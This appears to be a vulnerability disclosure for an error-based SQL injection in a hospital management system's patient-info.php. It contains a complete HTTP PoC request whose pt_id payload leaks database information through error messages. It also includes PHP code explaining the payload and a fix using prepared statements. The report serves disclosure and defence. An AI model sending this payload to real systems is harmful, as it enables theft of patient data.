SQL injection vulnerability in the Hospital Management Center search box

Build environment: Apache 2.4.39; MySQL 5.7.26; PHP 7.3.4

1.Vulnerability analysis

In patient-info.php, at code lines 87-90, the pt_id parameter submitted by POST is assigned to $pt_id and then concatenated directly into the SQL statement without any filtering or escaping. mysqli_query() executes that statement, and because the database error message is returned to the page unmasked, the result is an error-based SQL injection vulnerability.
We can use sqlmap to validate
Manual SQL injection proof
2.POC:
```http
POST /patient-info.php HTTP/1.1
Host: vulhms.test
Content-Length: 160
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://vulhms.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://vulhms.test/patient-info.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=iljducsilkhqvpp8up2b3uv1rg
Connection: close

pt_id=1' or (select 1174 from(select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a) and 'ace'='ace&pt_btn=Go%21
```
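The following is an added illustration written for this report, not code from the HMS project; the real patient-info.php is not reproduced on this page, so the vulnerable shape below (a POST value concatenated into the query, executed with mysqli_query(), error text shown unmasked) and the `patients`/`pt_id` table and column names are assumptions. It shows the statement the database receives for the PoC body above, why that statement produces the error the PoC relies on, and a hardened lookup that fixes both halves of the problem: the value is bound as a parameter, and database errors are logged server-side instead of being echoed to the client.

```php
<?php
// Added example for this report; not the project's own code.
// The vulnerable pattern is an assumption based on the description above.

// Builds the statement the way the vulnerable page does: plain string concatenation.
function vulnerable_query(string $pt_id): string {
    // Table and column names are assumptions for illustration.
    return "SELECT * FROM patients WHERE pt_id = '" . $pt_id . "'";
}

// The body of the PoC request from this report (pt_id field only).
$poc = "1' or (select 1174 from(select count(*),concat((select user()),"
     . "floor(rand(0)*2))x from information_schema.tables group by x)a) and 'ace'='ace";

// What MySQL actually receives:
// SELECT * FROM patients WHERE pt_id = '1' or (select 1174 from(...)a) and 'ace'='ace'
echo vulnerable_query($poc), PHP_EOL;
// The injected subquery groups by concat(user(), floor(rand(0)*2)). rand(0) is a
// fixed sequence, so the same group key is produced twice and MySQL aborts with
// "Duplicate entry '<user()>1' for key 'group_key'". Because the page prints the
// mysqli error unmasked, the result of user() comes back in the HTTP response.

// Hardened form: a prepared statement carries the value separately from the SQL
// text, so quotes in $pt_id can never change the statement; errors stay in the log.
function lookup_patient(mysqli $db, string $pt_id): ?array {
    $stmt = $db->prepare("SELECT * FROM patients WHERE pt_id = ?");
    if ($stmt === false) {
        error_log($db->error);          // server-side only, never echoed to the client
        return null;
    }
    $stmt->bind_param("s", $pt_id);     // bound as a string, not spliced into the query
    if (!$stmt->execute()) {
        error_log($stmt->error);
        $stmt->close();
        return null;
    }
    $row = $stmt->get_result()->fetch_assoc();   // get_result() requires mysqlnd
    $stmt->close();
    return $row ?: null;
}
```

Swapping the concatenation for lookup_patient() removes the injection; keeping mysqli_error() output off the page (and display_errors off in production) removes the error channel the PoC uses to read data back, which matters even for any remaining query that is not yet parameterised.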